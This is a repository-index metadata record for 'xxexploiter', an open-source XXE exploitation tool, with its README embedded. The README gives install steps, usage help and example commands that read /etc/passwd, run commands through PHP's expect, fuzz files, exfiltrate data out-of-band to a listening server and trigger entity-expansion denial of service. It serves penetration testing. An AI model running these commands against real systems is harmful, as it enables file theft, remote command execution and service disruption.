{"id":13542284,"url":"https://github.com/luisfontes19/xxexploiter","last_synced_at":"2026-04-10T10:35:13.137Z","repository":{"id":38995858,"uuid":"247289593","full_name":"luisfontes19/xxexploiter","owner":"luisfontes19","description":"Tool to help exploit XXE vulnerabilities","archived":false,"fork":false,"pushed_at":"2023-02-04T12:32:01.000Z","size":1388,"stargazers_count":540,"open_issues_count":4,"forks_count":69,"subscribers_count":14,"default_branch":"master","last_synced_at":"2024-11-03T07:33:12.967Z","etag":null,"topics":["cdata","command","dtd","entities","exection","expect","exploit","exploitation","external","file","oob","read","ssrf","xee","xml","xxe"],"latest_commit_sha":null,"homepage":"https://luisfontes19.github.io/xxexploiter/","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/luisfontes19.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2020-03-14T14:15:30.000Z","updated_at":"2024-11-01T22:22:01.000Z","dependencies_parsed_at":"2023-02-13T20:50:41.121Z","dependency_job_id":null,"html_url":"https://github.com/luisfontes19/xxexploiter","commit_stats":null,"previous_names":[],"tags_count":8,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luisfontes19%2Fxxexploiter","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luisfontes19%2Fxxexploiter/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luisfontes19%2Fxxexploiter/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luisfontes19%2Fxxexploiter/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/luisfontes19","download_url":"https://codeload.github.com/luisfontes19/xxexploiter/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789318,"owners_count":20834274,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cdata","command","dtd","entities","exection","expect","exploit","exploitation","external","file","oob","read","ssrf","xee","xml","xxe"],"created_at":"2024-08-01T10:01:04.035Z","updated_at":"2026-04-10T10:35:13.103Z","avatar_url":"https://github.com/luisfontes19.png","language":"TypeScript","funding_links":[],"categories":["Exploitation","Weapons","TypeScript (64)","TypeScript"],"sub_categories":["XXE Injection","Tools"],"readme":"# XXExploiter  \r\n  \r\n![Build](https://github.com/luisfontes19/xxexploiter/workflows/Build/badge.svg)\r\n[![codecov](https://codecov.io/gh/luisfontes19/xxexploiter/branch/master/graph/badge.svg)](https://codecov.io/gh/luisfontes19/xxexploiter)\r\n[![Known Vulnerabilities](https://snyk.io/test/github/luisfontes19/xxexploiter/badge.svg?targetFile=package.json)](https://snyk.io/test/github/luisfontes19/xxexploiter?targetFile=package.json)\r\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\r\n\r\n![XXExploiter](banner.png?raw=true)\r\n\r\n\r\nIt generates the XML payloads, and automatically starts a server to serve the needed DTD's or to do data exfiltration.   \r\n\r\n## Installation  \r\n  \r\n```\r\n#install node and npm if you don't have it yet \r\nnpm install -g xxexploiter\r\n```\r\n  \r\n## Building \u0026 Running  from source\r\nThis is a simple Node application written with typescript. So you can build it as you build other apps:  \r\n(install node and npm first, if you dont have them)  \r\n```  \r\nnpm install  \r\nnpm run build  \r\n#you may need to npm install typescript -g in order for 'npm build' to succeed \r\n```  \r\n  \r\nTo run the app you can do it with one of 3 ways:  \r\n  \r\n```  \r\nnpm start [args]  \r\nnode dist/index.js [args]  \r\nnpm link #and now just call xxexploiter\r\n```  \r\n\r\nOr you can install it on your system:\r\n\r\n```\r\nnpm link\r\n```\r\n  \r\n## Usage  \r\n  \r\n```  \r\nUsage: xxexploiter [command] [options]\r\n\r\nCommands:\r\n  xxexploiter file [file_to_read]  Use XXE to do a request\r\n  xxexploiter request [URL]        Use XXE to do a request\r\n  xxexploiter expect [command]     Use XXE to execute a command through PHP's expect\r\n  xxexploiter xee [expantions]     Generate a huge content by resolving entities\r\n\r\nFuzzing Specific Options\r\n  -w, --wordlist        Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg\r\n                        for the magic.\r\n  -y, --success-string  String to search for a success response in the requests. Not usefull for blind attacks\r\n  -n, --error-string    String to search for an error response in the request. Not usefull for blind attacks\r\n\r\nOptions:\r\n  --version             Show version number                                                                    [boolean]\r\n  -s, --server          Server address for OOB and DTD\r\n  -p, --port            Server port for OOB and DTDs. Default: 7777\r\n  -t, --template        path to an XML template where to inject payload\r\n  -m, --mode            Extraction Mode: xml, oob, cdata. Default: xml\r\n  -e, --encode          Extraction Encoding: none, phpbase64. Default: none\r\n  -o, --output          Output for the XML payload file. Default is to console\r\n  -x                    Use a request to automatically send the xml file\r\n  -X, --request-output  Output the response from -x option. If not defined goes to stdout\r\n  --verbose             Enable some messages help for understanding whats happening\r\n  --doctype             Specify the name of the doctype to be injected. Default is xxexploiter\r\n  -h, --help            Show help                                                                              [boolean]\r\n\r\nExamples:\r\n  xxexploiter expect ls\r\n  xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml\r\n  xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob\r\n  xxexploiter xee 900000000 -o output.xml\r\n  xxexploiter file /etc/passwd -x request.txt -t template.xml\r\n  xxexploiter file /root/{FUZZ} -w wordlist.txt -n \"not found\" -x request.txt\r\n\r\nExtra Info:\r\n  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to\r\n  be injected\r\n  - When specifiying file paths for windows use forward slash.\r\n  - OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.\r\n  Usefull with blind attacks\r\n  - When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use\r\n  cdata\r\n  - When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}\r\n  - When fuzzing you can add the {{FUZZ}} keyword in the main command argument.\r\n  - You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,\r\n  or an expected success string\r\n```  \r\n\r\n### Examples\r\n\r\n#### Simple payload Generation\r\n[![asciicast](https://asciinema.org/a/315867.svg)](https://asciinema.org/a/315867)\r\n\r\n#### Automating request to send payload\r\n[![asciicast](https://asciinema.org/a/315872.svg)](https://asciinema.org/a/315872)\r\n\r\n#### OOB Extraction with automated request\r\n[![asciicast](https://asciinema.org/a/315873.svg)](https://asciinema.org/a/315873)\r\n\r\n#### Fuzzing\r\n[![asciicast](https://asciinema.org/a/315876.svg)](https://asciinema.org/a/315876)\r\n   \r\n## Some notes:  \r\n  \r\nIf you choose to use OOB or CDATA mode, XXExploiter will generate the necessary dtd to be included, and will start a server to host them. Have in mind that if you use these options you should set the server address  \r\n  \r\nIf you include content in the body of the XML have in mind that XML restricted characters like '\u003c' may break the parsing so be sure to use CDATA or PHP's base64encode  \r\n  \r\nMost of languages limit the number of entity expantions, or the total length of the content expanded, so make sure you test XEE on your machine first, with the same conditions as the target  \r\n  \r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fluisfontes19%2Fxxexploiter","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fluisfontes19%2Fxxexploiter","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fluisfontes19%2Fxxexploiter/lists"}